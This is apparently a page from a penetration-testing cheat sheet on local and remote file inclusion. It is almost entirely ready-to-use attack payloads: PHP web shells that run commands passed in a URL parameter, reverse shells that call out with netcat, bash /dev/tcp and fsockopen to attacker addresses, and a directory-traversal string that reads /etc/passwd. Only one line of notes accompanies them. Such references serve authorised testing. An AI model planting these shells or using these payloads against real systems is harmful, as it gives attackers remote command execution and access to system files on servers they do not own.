LFI/RFI

Pentestmonkeys /usr/share/webshells/php/php-reverse-shell.php

<?php echo shell_exec("nc $TARGET_IP -e /bin/sh") ?>
<?php echo system($_GET["cmd"]);?>
<?php echo shell_exec($_GET["cmd"]);?>

Reverse TCP shell without netcat

<?php echo shell_exec('/bin/bash -i >& /dev/tcp/10.11.0.98/443 0>&1');?>
<?php $sock=fsockopen("127.0.0.1",1337); exec("/bin/sh -i <&3 >&3 2>&3");?>
../../../../../../../../../etc/passwd

Notes

  • Some versions of netcat does not support -e flag

References

PreviousCross CompilingNextSQL Injection

Last updated